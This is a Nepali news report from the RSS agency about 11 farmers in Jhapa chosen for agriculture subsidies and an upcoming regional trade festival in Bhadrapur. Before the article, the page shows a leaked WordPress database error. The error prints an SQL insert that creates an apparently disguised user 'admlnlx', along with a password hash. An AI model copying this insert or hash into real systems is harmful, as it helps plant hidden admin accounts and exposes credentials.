WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFaIWPFlpge93TYY/JLVII5vdVr7w6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 05:43:37', '', 'admlnlx', 'admlnlx')
भद्रपुर, फागुन ३ –
जिल्ला कृषि विकास कार्यालयले चालु आर्थिक वर्षमा सीमान्तकृत तथा पिछडिएका समुदायलक्षित कृषि विशेष कार्यक्रमका लागि ११ किसानलाई छनोट गरेको छ ।
सत्तार, माझी, सन्थाल र मेचे जातिका किसान छनोटमा परेका हुन् । प्रत्येकले कम्तीमा १० कठ्ठा जग्गामा तरकारीबाली लगाउनु पर्नेछ । कार्यालयले जनही रु ४० हजारका दरले अनुदान उपलब्ध गराउने वरिष्ठ कृषि विकास अधिकृत प्रकाश डाँगीले जानकारी दिनुभयो ।
कार्यक्रमका लागि जिल्लाका ४९ किसानले कार्यालयमा निवेदन दिएका थिए । स्थलगत मूल्याङ्कन, अनुगमन र ग्राहयताका आधारमा ११ किसान छनोटमा परेको बताइएको छ । छनोट गरिएकामा लखनपुर ४ का लुखिराम मुर्मु र ५ का चुकि मुर्मु, दुवागढी– ८ का डब्लु विर्जा, शरणामती – ७ का लखिराम मुर्मु, चकचकी – ४ का शिवलाल मुर्मु, जलथल– ७ का शयामलाल मुर्मु र बालुवाडी – ८ का लखिराम मुर्मु रहेका छन् ।
यस्तै कन्काई नगरपालिकाका –७ का बाबुलाल मराङग मई, खजरगाछी – ६ का विपिन हास्दा, केचना – १ का गौरसिंह माझी र जलथल –८ का शान्ति मुर्मु छनोटमा परेका छन् ।
कृषि तथा पर्यटन महोत्सव
भद्रपुरमा करिब छ दशकपछि पूर्वाञ्चल क्षेत्रीय औद्योगिक, व्यापार, कृषि तथा पर्यटन महोत्सव हुने भएको छ ।
फागुन १२ गतेदेखि २१ गतेसम्म भद्रपुर नगरपालिका वडा–५ झापा चोकमा सो महोत्सव हुनेछ । झापा उद्योग वाणिज्य सङ्घ र नेपाल उद्योग वाणिज्य महासङ्घ काठमाडाँै महोत्वका आयोजक रहेका छन् । महोत्सवमा १०० वटा कक्ष रहने छन् । – रासस